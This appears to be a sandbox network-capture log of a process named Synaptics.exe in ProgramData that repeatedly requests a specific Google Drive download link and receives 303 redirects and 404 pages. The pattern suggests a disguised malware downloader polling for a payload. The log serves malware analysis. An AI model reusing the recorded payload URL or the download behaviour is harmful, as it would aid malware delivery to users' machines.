                                                                                                                              2024-12-30 10:48:02 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Host: docs.google.com
                                                                                                                              Cache-Control: no-cache
                                                                                                                              2024-12-30 10:48:02 UTC1314INHTTP/1.1 303 See Other
                                                                                                                              Content-Type: application/binary
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:02 GMT
                                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-HVyaZbW7l24FeJmuGlRaxg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Server: ESF
                                                                                                                              Content-Length: 0
                                                                                                                              X-XSS-Protection: 0
                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Connection: close


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              7192.168.2.449755142.250.185.784437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:03 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Host: docs.google.com
                                                                                                                              Cache-Control: no-cache
                                                                                                                              2024-12-30 10:48:03 UTC1314INHTTP/1.1 303 See Other
                                                                                                                              Content-Type: application/binary
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:03 GMT
                                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-cySoYOwAoE4RdrUnDgDr9Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Server: ESF
                                                                                                                              Content-Length: 0
                                                                                                                              X-XSS-Protection: 0
                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Connection: close


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              8192.168.2.449756142.250.185.2254437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:03 UTC186OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Host: drive.usercontent.google.com
                                                                                                                              Connection: Keep-Alive
                                                                                                                              2024-12-30 10:48:03 UTC1594INHTTP/1.1 404 Not Found
                                                                                                                              X-GUploader-UploadID: AFiumC7VjRdgJBQTp2ivCHCqMng-XZiu-osy1H3244r7IhVfEycbi3Yc9jIntUs4tSuQwT7a
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:03 GMT
                                                                                                                              P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-IQnp4UwSABBLLKI8Wu7Zhw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Content-Length: 1652
                                                                                                                              Server: UploadServer
                                                                                                                              Set-Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0; expires=Tue, 01-Jul-2025 10:48:03 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                                              Connection: close
                                                                                                                              2024-12-30 10:48:03 UTC1594INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6b 6b 66 76 77 6a 73 4c 63 58 34 42 30 59 39 4d 5a 4d 50 4c 4b 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="kkfvwjsLcX4B0Y9MZMPLKw">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                                                                              2024-12-30 10:48:03 UTC58INData Raw: 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                              Data Ascii: nd on this server. <ins>Thats all we know.</ins></main>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              9192.168.2.449757142.250.185.784437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:03 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Host: docs.google.com
                                                                                                                              Cache-Control: no-cache
                                                                                                                              2024-12-30 10:48:03 UTC1314INHTTP/1.1 303 See Other
                                                                                                                              Content-Type: application/binary
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:03 GMT
                                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-syZ1gtrFt6aw6o41XXrUCw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Server: ESF
                                                                                                                              Content-Length: 0
                                                                                                                              X-XSS-Protection: 0
                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Connection: close


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              10192.168.2.449758142.250.185.2254437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:03 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Host: drive.usercontent.google.com
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Cookie: NID=520=JGnwI_MrsxSh5MBfXa7e5IGnwl-ptwajyonA18zaUTPq55C8vR_TGrQg_gtonkz49RyPV0DRYh4IJ4Mmnf7-zS-qApMkY5BYyO3wNjs_yfOU5ow0eVQUHfXqysZHTtoGjzn2_o1eI9UD6xsuiOh_cDgmkMUYU6VIgwjj-O3VN1-XW24tC42u91c
                                                                                                                              2024-12-30 10:48:03 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                              X-GUploader-UploadID: AFiumC5oxzMQQXrbkAfIHmBpCtXl798smnyoAxB7AekObd9w-_IqzDU6R_kVjS2_wuctMvOzq75n1Zc
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:03 GMT
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-UMBFZutEM33kzhxtGFhkOQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Content-Length: 1652
                                                                                                                              Server: UploadServer
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                                              Connection: close
                                                                                                                              2024-12-30 10:48:03 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                              2024-12-30 10:48:03 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 45 62 42 66 6f 62 4c 74 63 6b 71 64 6c 67 6f 66 6a 4e 77 52 44 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                              Data Ascii: 404 (Not Found)!!1</title><style nonce="EbBfobLtckqdlgofjNwRDQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                              2024-12-30 10:48:03 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                              Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              11192.168.2.449760142.250.185.784437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:04 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Host: docs.google.com
                                                                                                                              Cache-Control: no-cache
                                                                                                                              2024-12-30 10:48:04 UTC1314INHTTP/1.1 303 See Other
                                                                                                                              Content-Type: application/binary
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:04 GMT
                                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-uqwDqJZBGGMcYfpT1c-4xQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Server: ESF
                                                                                                                              Content-Length: 0
                                                                                                                              X-XSS-Protection: 0
                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Connection: close


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              12192.168.2.449761142.250.185.2254437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:04 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Host: drive.usercontent.google.com
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Cookie: NID=520=Lg--Z3MNSR6dPItDRtKtP1r9cxxvxAnqX_seVCI6-qswVZogoBMsy20UdoyvolgY4jsXxa03MypjCddOfLfnmlLI7lN7IlZduEZIatbBpXtzPJ8etFv4N6IpLm-XEEoTbE_64lHHATt3pCnDxEKnJ_69QRAFEoyKi-Yzj7JKmhP1M6ERhD7W0_8
                                                                                                                              2024-12-30 10:48:04 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                              X-GUploader-UploadID: AFiumC7TcpVJqTYCpF2oN8THm4_WNtu_rDYnPjVlr2N_olAGFwu5Mt5ZuhsUbUyz-ctsCugz-H6Tmxs
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:04 GMT
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce--rVWic90ABqllac5iUL0Ow' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Content-Length: 1652
                                                                                                                              Server: UploadServer
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                                              Connection: close
                                                                                                                              2024-12-30 10:48:04 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                              2024-12-30 10:48:04 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 70 49 36 77 5a 36 48 4b 4a 67 50 46 48 42 6a 73 47 5f 35 71 58 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                              Data Ascii: 404 (Not Found)!!1</title><style nonce="pI6wZ6HKJgPFHBjsG_5qXQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                              2024-12-30 10:48:04 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                              Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              13192.168.2.449762142.250.185.784437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:04 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Host: docs.google.com
                                                                                                                              Cache-Control: no-cache
                                                                                                                              2024-12-30 10:48:04 UTC1314INHTTP/1.1 303 See Other
                                                                                                                              Content-Type: application/binary
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:04 GMT
                                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-UI1tdqBJpv664stETl51yw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Server: ESF
                                                                                                                              Content-Length: 0
                                                                                                                              X-XSS-Protection: 0
                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Connection: close


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              14192.168.2.449763142.250.185.2254437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:04 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Host: drive.usercontent.google.com
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                                                                                                                              2024-12-30 10:48:04 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                              X-GUploader-UploadID: AFiumC4Srf_Q2hpDMVjhMHNZ7NiUZ7ea1BmLrOGs2ETZ-65vQWpBSCCjUfztih7qftgh-xtL
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:04 GMT
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
